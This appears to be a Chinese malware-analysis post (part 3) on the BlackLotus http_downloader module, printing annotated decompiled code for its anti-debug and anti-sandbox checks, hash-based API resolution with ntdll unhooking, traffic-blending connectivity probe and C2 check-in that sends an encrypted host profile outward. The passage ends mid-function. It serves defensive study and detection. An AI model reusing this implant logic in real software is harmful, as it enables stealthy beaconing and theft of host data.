BlackLotus 分析3--http_downloader

BlackLotus 分析3--http_downloader

本模块是由 inject_into_winlogon 注入到 winlogon.exe 中的 PE 文件，其 DOS 头的 MZ 魔术字被改为 "HC"（推测用于规避对内存中 PE 头的扫描）。

start

反调试和反沙箱部分与安装器相同；任一检测命中后不是退出，而是进入 while(1) 死循环，使进程保持存活但不产生任何网络行为。

/*
 * Entry point of the http_downloader payload.
 *
 * Order of operations as decompiled:
 *   1. Hide the current thread from debuggers (NtSetInformationThread with
 *      ThreadHideFromDebugger on (HANDLE)-2, the current-thread pseudo-handle).
 *   2. Resolve the ntdll exports it needs by hash (init_ntdll_api).
 *   3. Run the same anti-debug / anti-sandbox battery as the installer.  Any
 *      hit parks the thread in an infinite loop: the process stays alive but
 *      idle instead of exiting, so a sandbox never sees a clean exit and no
 *      network activity is produced.
 *   4. Load the remaining DLLs (init_other_api) and retry the C2 check-in
 *      until communication_140004804() returns exactly 1.  The sleeps between
 *      attempts live inside that callee; this loop itself does not sleep.
 *   5. Terminate the current thread with exit code 1.
 *
 * Detection note: NtSetInformationThread(ThreadHideFromDebugger) is a
 * well-known anti-debugging primitive and a usable hunting signal on its own.
 * The individual checks below are not shown on this page; the page states
 * they are identical to the installer's.
 */
__int64 start()
{
  // (HANDLE)-2 == NtCurrentThread(); hides this thread from an attached debugger.
  NtSetInformationThread((HANDLE)0xFFFFFFFFFFFFFFFEi64, ThreadHideFromDebugger, 0i64, 0);
  init_ntdll_api();
  // Anti-analysis gate: default-locale check, PEB BeingDebugged /
  // NtGlobalFlag / NtQueryInformationProcess debug checks, kernel debugger,
  // VEH-based int3 / int2d probes, then sandbox fingerprints (loaded DLL
  // names, running processes, registry keys/values, RSMB (= raw SMBIOS) and
  // ACPI firmware tables, MAC address, rdtsc timing).  Evaluation
  // short-circuits on the first hit.
  if ( (unsigned int)is_default_locale_banned()
    || isBeingDebugged()
    || check_NtGlobalFlag()
    || is_being_debugged_ntqueryinformationprocess()
    || (unsigned int)is_kernel_debugger_present()
    || (unsigned int)is_being_debugged_by_vectored_exception_handler_int3()
    || (unsigned int)is_being_debugged_by_vectored_exception_handler_int2d()
    || (unsigned int)anti_sandbox_check_loaded_dlls_basename()
    || (unsigned int)anti_sandbox_check_loaded_dlls_fullname()
    || (unsigned int)anti_sandbox_check_processes_running()
    || (unsigned int)anti_sandbox_check_registry_key_present()
    || (unsigned int)anti_sandbox_check_registry_values()
    || (unsigned int)anti_sandbox_check_RSMB()
    || (unsigned int)anti_sandbox_check_ACPI()
    || (unsigned int)anti_sandbox_check_mac_addr()
    || (unsigned int)anti_sandbox_rdtsc() )
  {
    // Any hit -> spin forever rather than exit.
    while ( 1 )
      ;
  }

  init_other_api();
  // Busy-retry the beacon until it reports success (== 1).
  while ( (unsigned int)communication_140004804() != 1 )
    ;

  NtTerminateThread((HANDLE)0xFFFFFFFFFFFFFFFEi64, 1);
  return 0i64;
}

init_ntdll_api

不使用导入表：先通过 get_ntdll_and_unhook 取得 ntdll 基址（按函数名推测同时会去除用户态 hook），再用 32 位名称哈希通过 get_proc_address_by_hash 逐个解析导出函数，结果存入全局函数指针；解析结果未做空指针检查。

/*
 * Resolve the ntdll.dll exports this module uses and store them in global
 * function pointers.  No import table is involved: ntdll is located (and, per
 * the helper's name, un-hooked) by get_ntdll_and_unhook(), and each export is
 * looked up by a 32-bit name hash via get_proc_address_by_hash().  The hash
 * algorithm itself is not shown on this page.
 *
 * Nothing is NULL-checked here; a failed lookup leaves a NULL global that
 * would fault at first use.
 *
 * Analyst note: the hash constants are sample-specific and make good static
 * signatures.  The resolved set (LdrLoadDll, heap, vectored exception
 * handlers, Wow64 thread context get/set, SID helpers, snwprintf) is a
 * compact summary of what the payload can do without importing anything.
 */
void __stdcall init_ntdll_api()
{
  struct _IMAGE_DOS_HEADER *ntdll; // rbx

  // 0xD22E2014 is the hash of the module name, not an address.
  ntdll = get_ntdll_and_unhook(0xD22E2014);
  LdrGetProcedureAddress = (NTSTATUS (__stdcall *)(PVOID, PANSI_STRING, ULONG, PVOID *))get_proc_address_by_hash(
                                                                                          ntdll,
                                                                                          0xB08469DD,
                                                                                          0);
  RtlInitUnicodeString = (void (__stdcall *)(PUNICODE_STRING, PCWSTR))get_proc_address_by_hash(ntdll, 0xC8D8F9F4, 0);
  LdrLoadDll = (NTSTATUS (__stdcall *)(PWSTR, PULONG, PUNICODE_STRING, PVOID *))get_proc_address_by_hash(
                                                                                  ntdll,
                                                                                  0xF6CFC604,
                                                                                  0);
  RtlAllocateHeap = (PVOID (__stdcall *)(PVOID, ULONG, SIZE_T))get_proc_address_by_hash(ntdll, 0x572D53D3u, 0);
  RtlFreeHeap = (BOOLEAN (__stdcall *)(HANDLE, ULONG, PVOID))get_proc_address_by_hash(ntdll, 0x10DE9522u, 0);
  // VEH add/remove: used by the int3 / int2d anti-debug probes in start().
  RtlRemoveVectoredExceptionHandler = (ULONG (__stdcall *)(PVOID))get_proc_address_by_hash(ntdll, 0xBB26CCEB, 0);
  RtlAddVectoredExceptionHandler = (PVOID (__stdcall *)(ULONG, PVECTORED_EXCEPTION_HANDLER))get_proc_address_by_hash(
                                                                                              ntdll,
                                                                                              0x89AB8454,
                                                                                              0);
  wcsstr = (wchar_t *(__cdecl *)(const wchar_t *, const wchar_t *))get_proc_address_by_hash(ntdll, 0xB2AECB6A, 0);
  itow = (wchar_t *(__cdecl *)(int, wchar_t *, int))get_proc_address_by_hash(ntdll, 0x839101F2, 0);
  RtlSubAuthoritySid = (PULONG (__stdcall *)(PSID, ULONG))get_proc_address_by_hash(ntdll, 0x319CEA81u, 0);
  RtlSubAuthorityCountSid = (PUCHAR (__stdcall *)(PSID))get_proc_address_by_hash(ntdll, 0xC96D110C, 0);
  snwprintf = (int (*)(wchar_t *, size_t, const wchar_t *, ...))get_proc_address_by_hash(ntdll, 0x81E8EC96, 0);
  RtlReAllocateHeap = (PVOID (__stdcall *)(HANDLE, ULONG, PVOID, SIZE_T))get_proc_address_by_hash(ntdll, 0x4D018A66u, 0);
  wtoi = (int (__cdecl *)(const wchar_t *))get_proc_address_by_hash(ntdll, 0xEF06C56u, 0);
  // Wow64 thread-context accessors: not used on this page; their presence
  // suggests 32-bit target manipulation elsewhere in the module (unconfirmed).
  RtlWow64GetThreadContext = (NTSTATUS (__stdcall *)(HANDLE, PWOW64_CONTEXT))get_proc_address_by_hash(
                                                                               ntdll,
                                                                               0x5F6A5C62u,
                                                                               0);
  RtlWow64SetThreadContext = (NTSTATUS (__stdcall *)(HANDLE, PWOW64_CONTEXT))get_proc_address_by_hash(
                                                                               ntdll,
                                                                               0x31FC956u,
                                                                               0);
  RtlIdentifierAuthoritySid = (PSID_IDENTIFIER_AUTHORITY (__stdcall *)(PSID))get_proc_address_by_hash(
                                                                               ntdll,
                                                                               0xEF508FEu,
                                                                               0);
}

init_other_api

/*
 * Load the remaining DLLs by deobfuscated name and resolve their exports by
 * hash into global function pointers (same scheme as init_ntdll_api).
 *
 * Capability map, by DLL:
 *   winhttp   - C2 transport (Open/Connect/OpenRequest/SendRequest/
 *               ReceiveResponse/ReadData/QueryHeaders/QueryDataAvailable/
 *               SetOption/CloseHandle).
 *   bcrypt    - hashing (CreateHash/HashData/FinishHash/DestroyHash),
 *               symmetric key generation, Encrypt/Decrypt, GenRandom,
 *               Get/SetProperty.
 *   crypt32   - Base64 (CryptBinaryToString*/CryptStringToBinary*), ASN.1
 *               decode and public-key import (CryptDecodeObjectEx,
 *               CryptImportPublicKeyInfoEx2) - consistent with the RSA
 *               public-key encryption applied to the check-in blob.
 *   wtsapi32 / userenv / advapi32 - enumerate sessions, query a user token,
 *               build an environment block and CreateProcessAsUserW, i.e. the
 *               ability to spawn a process inside a logged-on user's session.
 *   kernel32  - Sleep, GlobalMemoryStatusEx, WideCharToMultiByte, and a
 *               LoadLibraryA/GetProcAddress pair.
 *
 * Returns the last pointer resolved (CryptStringToBinaryW); that is a
 * decompiler rendering of the final assignment, not a meaningful status.
 * Neither the DLL loads nor the lookups are checked for failure.
 */
BOOL *__stdcall init_other_api()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Each DLL name is stored obfuscated and decoded just before loading.
  // winhttp.dll
  v0 = deobfuscate_wstring(word_14000ADB8, 0xCu, 1);
  winhttp = load_library_w((__int64)v0);
  // bcrypt.dll
  v2 = deobfuscate_wstring(word_14000ADD8, 0xBu, 1);
  bcrypt = load_library_w((__int64)v2);
  // crypt32.dll
  v4 = deobfuscate_wstring(word_14000ADF0, 0xCu, 1);
  crypt32 = load_library_w((__int64)v4);
  // kernel32.dll
  v6 = deobfuscate_wstring(word_14000AE10, 0xDu, 1);
  kernel32 = load_library_w((__int64)v6);
  // advapi32.dll
  v8 = deobfuscate_wstring(word_14000AE30, 0xDu, 1);
  advapi32 = load_library_w((__int64)v8);
  // wtsapi32.dll
  v10 = deobfuscate_wstring(word_14000AE50, 0xDu, 1);
  wtsapi32 = load_library_w((__int64)v10);
  // userenv.dll
  v12 = deobfuscate_wstring(word_14000AE70, 0xCu, 1);
  userenv = load_library_w((__int64)v12);
  // --- winhttp: the C2 transport ---
  WinHttpOpen = (HINTERNET (__stdcall *)(LPCWSTR, DWORD, LPCWSTR, LPCWSTR, DWORD))get_proc_address_by_hash(
                                                                                    winhttp,
                                                                                    0x8EAD24EE,
                                                                                    0);
  WinHttpConnect = (HINTERNET (__stdcall *)(HINTERNET, LPCWSTR, INTERNET_PORT, DWORD))get_proc_address_by_hash(
                                                                                        winhttp,
                                                                                        0xAF02EC06,
                                                                                        0);
  WinHttpOpenRequest = (HINTERNET (__stdcall *)(HINTERNET, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR *, DWORD))get_proc_address_by_hash(winhttp, 0xF1EA7021, 0);
  WinHttpSendRequest = (BOOL (__stdcall *)(HINTERNET, LPCWSTR, DWORD, LPVOID, DWORD, DWORD, DWORD_PTR))get_proc_address_by_hash(winhttp, 0xFACA0A03, 0);
  WinHttpReceiveResponse = (BOOL (__stdcall *)(HINTERNET, LPVOID))get_proc_address_by_hash(winhttp, 0xBFDC2C0u, 0);
  WinHttpReadData = (BOOL (__stdcall *)(HINTERNET, LPVOID, DWORD, LPDWORD))get_proc_address_by_hash(
                                                                             winhttp,
                                                                             0x66408124u,
                                                                             0);
  WinHttpCloseHandle = (BOOL (__stdcall *)(HINTERNET))get_proc_address_by_hash(winhttp, 0xA8EDA2BC, 0);
  WinHttpQueryHeaders = (BOOL (__stdcall *)(HINTERNET, DWORD, LPCWSTR, LPVOID, LPDWORD, LPDWORD))get_proc_address_by_hash(
                                                                                                   winhttp,
                                                                                                   0x674823C2u,
                                                                                                   0);
  WinHttpQueryDataAvailable = (BOOL (__stdcall *)(HINTERNET, LPDWORD))get_proc_address_by_hash(winhttp, 0xA882FF5B, 0);
  WinHttpSetOption = (BOOL (__stdcall *)(HINTERNET, DWORD, LPVOID, DWORD))get_proc_address_by_hash(
                                                                            winhttp,
                                                                            0xACEE6AF3,
                                                                            0);
  // --- userenv / wtsapi32 / advapi32: run a process in a user's session ---
  CreateEnvironmentBlock = (BOOL (__stdcall *)(LPVOID *, HANDLE, BOOL))get_proc_address_by_hash(userenv, 0x7E20FED6u, 0);
  DestroyEnvironmentBlock = (BOOL (__stdcall *)(LPVOID))get_proc_address_by_hash(userenv, 0x4AF5EC14u, 0);
  WTSEnumerateSessionsW = (BOOL (__stdcall *)(HANDLE, DWORD, DWORD, PWTS_SESSION_INFOW *, DWORD *))get_proc_address_by_hash(
                                                                                                     wtsapi32,
                                                                                                     0xBDB0B9AC,
                                                                                                     0);
  WTSQueryUserToken = (BOOL (__stdcall *)(ULONG, PHANDLE))get_proc_address_by_hash(wtsapi32, 0x5B88473Cu, 0);
  WTSFreeMemory = (void (__stdcall *)(PVOID))get_proc_address_by_hash(wtsapi32, 0xE51007E3, 0);
  WTSQuerySessionInformationW = (BOOL (__stdcall *)(HANDLE, DWORD, WTS_INFO_CLASS, LPWSTR *, DWORD *))get_proc_address_by_hash(wtsapi32, 0x4A851ECFu, 0);
  CreateProcessAsUserW = (BOOL (__stdcall *)(HANDLE, LPCWSTR, LPWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION))get_proc_address_by_hash(advapi32, 0x7C259F87u, 0);
  // --- kernel32 ---
  Sleep = (void (__stdcall *)(DWORD))get_proc_address_by_hash(kernel32, 0xD8A41517, 0);
  GlobalMemoryStatusEx = (BOOL (__stdcall *)(LPMEMORYSTATUSEX))get_proc_address_by_hash(kernel32, 0x6DBFC569u, 0);
  WideCharToMultiByte = (int (__stdcall *)(UINT, DWORD, LPCWCH, int, LPSTR, int, LPCCH, LPBOOL))get_proc_address_by_hash(
                                                                                                  kernel32,
                                                                                                  0x45C481FDu,
                                                                                                  0);
  LoadLibraryA = (HMODULE (__stdcall *)(LPCSTR))get_proc_address_by_hash(kernel32, 0xDF2BBBEC, 0);
  GetProcAddress = (FARPROC (__stdcall *)(HMODULE, LPCSTR))get_proc_address_by_hash(kernel32, 0x80E96588, 0);
  // --- bcrypt: hashing, symmetric crypto, RNG ---
  BCryptOpenAlgorithmProvider = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE *, LPCWSTR, LPCWSTR, ULONG))get_proc_address_by_hash(bcrypt, 0xC694168A, 0);
  BCryptGetProperty = (NTSTATUS (__stdcall *)(BCRYPT_HANDLE, LPCWSTR, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(bcrypt, 0x5239823Fu, 0);
  BCryptCreateHash = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, BCRYPT_HASH_HANDLE *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(bcrypt, 0x9144E6F6, 0);
  BCryptHashData = (NTSTATUS (__stdcall *)(BCRYPT_HASH_HANDLE, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
                                                                                       bcrypt,
                                                                                       0xBC045064,
                                                                                       0);
  BCryptFinishHash = (NTSTATUS (__stdcall *)(BCRYPT_HASH_HANDLE, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
                                                                                         bcrypt,
                                                                                         0x5BF0EF2Du,
                                                                                         0);
  BCryptDestroyHash = (NTSTATUS (__stdcall *)(BCRYPT_HASH_HANDLE))get_proc_address_by_hash(bcrypt, 0x4F7C041Cu, 0);
  BCryptCloseAlgorithmProvider = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, ULONG))get_proc_address_by_hash(
                                                                                     bcrypt,
                                                                                     0x1ACC1354u,
                                                                                     0);
  BCryptEncrypt = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE, PUCHAR, ULONG, void *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(bcrypt, 0x63BF14B9u, 0);
  BCryptDestroyKey = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE))get_proc_address_by_hash(bcrypt, 0xB241FED1, 0);
  BCryptGenRandom = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
                                                                                       bcrypt,
                                                                                       0x3EC63647u,
                                                                                       0);
  BCryptDecrypt = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE, PUCHAR, ULONG, void *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(bcrypt, 0xC604BB01, 0);
  BCryptGenerateSymmetricKey = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, BCRYPT_KEY_HANDLE *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(bcrypt, 0x5CD9DC29u, 0);
  BCryptSetProperty = (NTSTATUS (__stdcall *)(BCRYPT_HANDLE, LPCWSTR, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
                                                                                              bcrypt,
                                                                                              0x2163244Bu,
                                                                                              0);
  // --- crypt32: Base64 and public-key import ---
  CryptBinaryToStringW = (BOOL (__stdcall *)(const BYTE *, DWORD, DWORD, LPWSTR, DWORD *))get_proc_address_by_hash(
                                                                                            crypt32,
                                                                                            0xBA9252BC,
                                                                                            0);
  CryptBinaryToStringA = (BOOL (__stdcall *)(const BYTE *, DWORD, DWORD, LPSTR, DWORD *))get_proc_address_by_hash(
                                                                                           crypt32,
                                                                                           0xBA9252A6,
                                                                                           0);
  CryptDecodeObjectEx = (BOOL (__stdcall *)(DWORD, LPCSTR, const BYTE *, DWORD, DWORD, PCRYPT_DECODE_PARA, void *, DWORD *))get_proc_address_by_hash(crypt32, 0xE57C09CE, 0);
  CryptImportPublicKeyInfoEx2 = (BOOL (__stdcall *)(DWORD, PCERT_PUBLIC_KEY_INFO, DWORD, void *, BCRYPT_KEY_HANDLE *))get_proc_address_by_hash(crypt32, 0x95F5B5CE, 0);
  CryptStringToBinaryA = (BOOL (__stdcall *)(LPCSTR, DWORD, DWORD, BYTE *, DWORD *, DWORD *, DWORD *))get_proc_address_by_hash(crypt32, 0xDD36B2A6, 0);
  // The return value is simply the last lookup result.
  result = (BOOL *)get_proc_address_by_hash(crypt32, 0xDD36B2BC, 0);
  CryptStringToBinaryW = (BOOL (__stdcall *)(LPCWSTR, DWORD, DWORD, BYTE *, DWORD *, DWORD *, DWORD *))result;
  return result;
}

communication_140004804

HTTP 通信部分：先 Sleep 10 秒并用 msftncsi 探测联网，然后把 getinfo 产生的加密主机信息拼成 "checkin=<info>"，以 60 秒（0xEA60 ms）为间隔循环调用 do_1400049F4，直到其返回非 0 为止。

/*
 * C2 check-in driver.
 *
 * Builds the request body "checkin=<info>", where <info> is the RSA-encrypted,
 * Base64- and URL-encoded host profile produced by getinfo_140005DFC(), then
 * loops: confirm Internet reachability (msftncsi_140003FD4), attempt the
 * exchange (do_1400049F4), sleep httpst.sleep_dwMilliseconds (0xEA60 =
 * 60,000 ms), repeat until do_1400049F4 returns non-zero.  That value is what
 * this function returns; start() only accepts 1.
 *
 * Timing / network indicators visible here:
 *   - 10 s delay before the first WinHTTP call.
 *   - 10 s between failed connectivity probes.
 *   - 60 s beacon interval (sleep_dwMilliseconds); RoundIndex starts at 1.
 *   - User-Agent is the bare string "Mozilla/5.0".
 *
 * Decompiler artifacts to read past:
 *   - The do/while under "checkin=" is an inlined bounded string copy
 *     (strcpy_s-style: the 2147483646 sentinel and the trailing-NUL fixup are
 *     its guard logic) that copies "checkin=" into Heap.
 *   - strcat(Heap, (const char *)v5) shows the *length* v5 where the appended
 *     string is evidently info_enc (v0); the author's comment reads it the
 *     same way.  Treat the operand as mis-recovered, not as a sample bug.
 *
 * Cleanup: the DataST_20 buffer, the body, the encrypted profile string and
 * the session handle are released on every path.
 */
__int64 communication_140004804()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  memset(&httpst, 0, sizeof(httpst));
  httpst.sleep_dwMilliseconds = 0xEA60;         // 60 s beacon interval
  httpst.RoundIndex = 1;
  v0 = 0i64;
  Heap = 0i64;
  v2 = 0;
  Sleep(10000u);
  // Mozilla/5.0
  pszAgentW = deobfuscate_wstring(word_14000B0A8, 0xCu, 1);
  httpst.hSession = WinHttpOpen(pszAgentW, 0, 0i64, 0i64, 0);
  if ( httpst.hSession )
  {
    while ( !(unsigned int)msftncsi_140003FD4(&httpst.hSession) )// connectivity probe, retried every 10 s
      Sleep(10000u);

    info_enc = getinfo_140005DFC(httpst.hSession);
    v0 = info_enc;
    if ( info_enc )
    {
      // 0x33 = 51 extra bytes: room for "checkin=" plus slack.
      v5 = strlen(info_enc) + 0x33;
      // RtlAllocateHeap flag 8 == HEAP_ZERO_MEMORY.
      Heap = (char *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v5);
      if ( Heap )
      {
        // checkin=
        v6 = deobfuscate_bytes(checkin_14000B0C8, 9u, 1);
        if ( v5 )
        {
          if ( v5 <= 0x7FFFFFFF )
          {
            // Inlined bounded copy of "checkin=" (v6) into Heap.
            v7 = v5;
            v8 = Heap;
            v9 = v6 - (BYTE *)Heap;
            do
            {
              if ( !(2147483646 - v5 + v7) )
                break;

              v10 = v8[v9];
              if ( !v10 )
                break;

              *v8++ = v10;
              --v7;
            }
            while ( v7 );

            v11 = v8 - 1;
            if ( v7 )
              v11 = v8;

            *v11 = 0;
          }
          else
          {
            *Heap = 0;
          }
        }                                       // checkin=

        strcat(Heap, (const char *)v5);         // append info_enc after "checkin=" (operand mis-recovered by the decompiler; see header)
        // Beacon loop: re-check connectivity, try the exchange, sleep 60 s,
        // until do_1400049F4 reports success.
        do
        {
          if ( (unsigned int)msftncsi_140003FD4(&httpst.hSession) )
            v2 = do_1400049F4(&httpst, Heap);

          Sleep(httpst.sleep_dwMilliseconds);
        }
        while ( !v2 );
      }
    }
  }

  freebuf_1400073F4(&httpst.DataST_20);
  if ( Heap )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);

  if ( v0 )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v0);

  if ( httpst.hSession )
    WinHttpCloseHandle(httpst.hSession);

  return v2;
}

msftncsi_140003FD4

/*
 * Internet-reachability probe.  Issues "GET http://www.msftncsi.com/ncsi.txt"
 * on port 80 (0x50) over the caller's WinHTTP session and returns 1 only if
 * the HTTP status is 200, otherwise 0.  The response body is never read.
 *
 * This is the same host/path Windows' own Network Connectivity Status
 * Indicator uses, so the request blends with normal OS traffic.  What still
 * distinguishes it: the session's User-Agent ("Mozilla/5.0", set by the
 * caller) and the fact that only the status code is checked - the real NCSI
 * client also compares the body.
 *
 * 0x20000013 == WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER, with
 * v10 = sizeof(DWORD) as the in/out length of the status buffer.
 *
 * Both request and connect handles are closed before returning; the session
 * is owned by the caller.
 */
__int64 __fastcall msftncsi_140003FD4(HINTERNET *hSession)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0;
  v10 = 4;                                      // sizeof(DWORD) for the status-code query
  if ( *hSession )
  {
    // www.msftncsi.com
    pswzServerName = deobfuscate_wstring(word_14000B058, 0x11u, 1);
    hConnect = WinHttpConnect(*hSession, pswzServerName, 0x50u, 0);
    if ( hConnect )
    {
      // /ncsi.txt
      pwszObjectName = deobfuscate_wstring(word_14000B080, 0xAu, 0);
      // GET
      pwszVerb = deobfuscate_wstring(word_14000B098, 4u, 0);
      hRequest = WinHttpOpenRequest(hConnect, pwszVerb, pwszObjectName, 0i64, 0i64, 0i64, 0);
      hRequest1 = hRequest;
      if ( hRequest )
      {
        // Success == status 200 only; no body validation.
        if ( WinHttpSendRequest(hRequest, 0i64, 0, 0i64, 0, 0, 0i64)
          && WinHttpReceiveResponse(hRequest1, 0i64)
          && WinHttpQueryHeaders(hRequest1, 0x20000013u, 0i64, &status, &v10, 0i64)// WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER
          && status == HTTP_STATUS_OK )
        {
          v1 = 1;
        }

        WinHttpCloseHandle(hRequest1);
      }

      WinHttpCloseHandle(hConnect);
    }
  }

  return v1;
}

getinfo_140005DFC

/*
 * Build the host-profile JSON for the check-in and return it RSA-encrypted,
 * Base64-encoded and URL-encoded (heap string, caller frees), or NULL.
 *
 * Fields collected (JSON key -> source):
 *   HWID       - MD5(MAC || volume serial), see
 *                get_HWID_MAC_VolumeSerialNumber_md5wstr(); the author notes
 *                it doubles as the AES key for later traffic.
 *   Session    - gSession_RNG_14000F568, a process-lifetime random value
 *                drawn once from csprng_uint32().
 *   Owner      - registry RegisteredOwner.
 *   IP         - public IP fetched from api.ipify.org.
 *   OS         - registry CurrentBuild.
 *   Edition    - registry ProductName.
 *   CPU / GPU  - ProcessorNameString / WinSAT data.
 *   RAM        - GB, 1977 if unavailable.
 *   Integrity  - token integrity level RID; 1977 if it is 0 or if the level
 *                is SYSTEM and set_cmd_P_1400082B8() fails (helper unknown).
 *   SecureBoot - UEFISecureBootEnabled registry flag.
 *   Build      - the literal 29082022 (author reads it as 2022-08-29).
 *
 * Sanitisation: relpace_sep_1400052B4 replaces '"' with '-' in every string
 * field so a crafted value cannot break the JSON.  Missing string fields point
 * at the global `unknown` (an empty placeholder; the frees at the end skip
 * that address).
 *
 * Size guards (all in WCHARs): Owner > 0xFF or Build > 0x32 aborts the whole
 * profile (returns NULL).  If the summed field length v28 reaches 0x1F4 (500),
 * GPU, CPU, Edition and IP are replaced by the empty placeholder rather than
 * truncated.  The output buffer is v28 + 150 WCHARs; snwprintf is bounded by
 * that size.
 *
 * Decompiler artifacts: the nested "if ( v36 )" chain tests the same flag
 * three times; the bare wcslen(buf) call discards its result; the first
 * do/while is an inlined bounded copy of a 4-WCHAR deobfuscated string into
 * `unknown` whose contents were not recovered on this page.
 *
 * All per-field heap strings and HWID are freed before returning.
 */
CHAR *__fastcall getinfo_140005DFC(HINTERNET hSession)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v43 = 0i64;
  RegisteredOwnerData1 = 0i64;
  publicip1 = 0i64;
  CurrentBuild_1 = 0i64;
  CPUinfo1 = 0i64;
  GPUinfo1 = 0i64;
  v6 = 0i64;
  v7 = 4i64;
  isUEFISecureBootEnabled = isUEFISecureBootEnabled_140005CB4();
  // 4-WCHAR deobfuscated string, contents not recovered (author marked "???").
  v8 = deobfuscate_wstring(word_14000B430, 4u, 1);
  ptr = &unknown;                               // destination: the empty-placeholder global
  v10 = (char *)v8 - &unknown;
  // Inlined bounded wide copy of v8 into `unknown` (max 4 WCHARs).
  do
  {
    if ( v7 == -2147483642 )
      break;

    v11 = *(_WORD *)&ptr[v10];
    if ( !v11 )
      break;

    *(_WORD *)ptr = v11;
    ptr += 2;
    --v7;
  }
  while ( v7 );

  v12 = ptr - 2;
  if ( v7 )
    v12 = ptr;

  *(_WORD *)v12 = 0;
  HWID = get_HWID_MAC_VolumeSerialNumber_md5wstr();// author's note: also used as the AES key for later traffic
  if ( HWID )
  {
    // Session id is generated once per process and reused on every check-in.
    if ( gSession_RNG_14000F568 || (gSession_RNG_14000F568 = csprng_uint32()) != 0 )
    {
      RegisteredOwnerData = get_RegisteredOwner_data_140006238();
      RegisteredOwnerData1 = &unknown;
      if ( RegisteredOwnerData )
        RegisteredOwnerData1 = (char *)RegisteredOwnerData;

      // Owner longer than 255 WCHARs aborts the profile.
      if ( (unsigned int)wcslen((wchar_t *)RegisteredOwnerData1) <= 0xFF )
      {
        publicip = (char *)get_publicip_1400059FC(hSession);// public IP via api.ipify.org (plaintext HTTP)
        publicip1 = &unknown;
        if ( publicip )
          publicip1 = publicip;

        CurrentBuild = get_CurrentBuild_140005BA0();// OS build number from the registry
        CurrentBuild_1 = &unknown;
        if ( CurrentBuild )
          CurrentBuild_1 = (char *)CurrentBuild;

        // Build string longer than 50 WCHARs aborts the profile.
        if ( (unsigned int)wcslen((wchar_t *)CurrentBuild_1) <= 0x32 )
        {
          CPUinfo = get_ProcessorNameString_1400055A4();// CPU name string
          CPUinfo1 = &unknown;
          if ( CPUinfo )
            CPUinfo1 = (char *)CPUinfo;

          GPUinfo = get_GPU_info_140005758();   // GPU info from SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT (key may be absent)
          GPUinfo1 = &unknown;
          if ( GPUinfo )
            GPUinfo1 = (char *)GPUinfo;

          RAM_GB = get_RAM_GB_140005C78();      // RAM in GB; 1977 is the "unknown" placeholder
          if ( !RAM_GB )
            RAM_GB = 1977;

          RAM_GB1 = RAM_GB;
          ProductName_140005680 = get_ProductName_140005680();// ProductName (OS edition string)
          ProductName = &unknown;
          if ( ProductName_140005680 )
            ProductName = (char *)ProductName_140005680;

          v44 = ProductName;
          dwIntegrityLevel = get_IntegrityLevel_14000591C();// current token integrity level (SECURITY_MANDATORY_*_RID)
          IntegrityLevel1 = dwIntegrityLevel;
          // SECURITY_MANDATORY_UNTRUSTED_RID == 0; 0, or SYSTEM with a failed
          // set_cmd_P_1400082B8(), is reported as the 1977 placeholder.
          if ( !dwIntegrityLevel || dwIntegrityLevel == SECURITY_MANDATORY_SYSTEM_RID && !set_cmd_P_1400082B8() )
            IntegrityLevel1 = 1977;

          // Replace '"' with '-' in each string field (author: relpace "--> -).
          relpace_sep_1400052B4(RegisteredOwnerData1);
          relpace_sep_1400052B4(publicip1);
          relpace_sep_1400052B4(CurrentBuild_1);
          relpace_sep_1400052B4(CPUinfo1);
          relpace_sep_1400052B4(GPUinfo1);
          relpace_sep_1400052B4(ProductName);
          // Sum of field lengths (+0xA5 for the format-string skeleton) sizes
          // the output buffer and drives the 0x1F4 guard below.
          v22 = wcslen((wchar_t *)ProductName);
          v23 = wcslen((wchar_t *)GPUinfo1) + v22;
          v24 = wcslen((wchar_t *)CPUinfo1) + v23;
          v25 = wcslen((wchar_t *)CurrentBuild_1) + v24;
          v26 = wcslen((wchar_t *)publicip1) + v25;
          v27 = wcslen((wchar_t *)RegisteredOwnerData1) + v26;
          v28 = wcslen(HWID) + 0xA5 + v27;
          v48 = v28;
          ProcessHeap = NtCurrentPeb()->ProcessHeap;
          bufsz = v28 + 150;
          buf = (wchar_t *)RtlAllocateHeap(ProcessHeap, 8u, 2 * bufsz);
          if ( buf )
          {
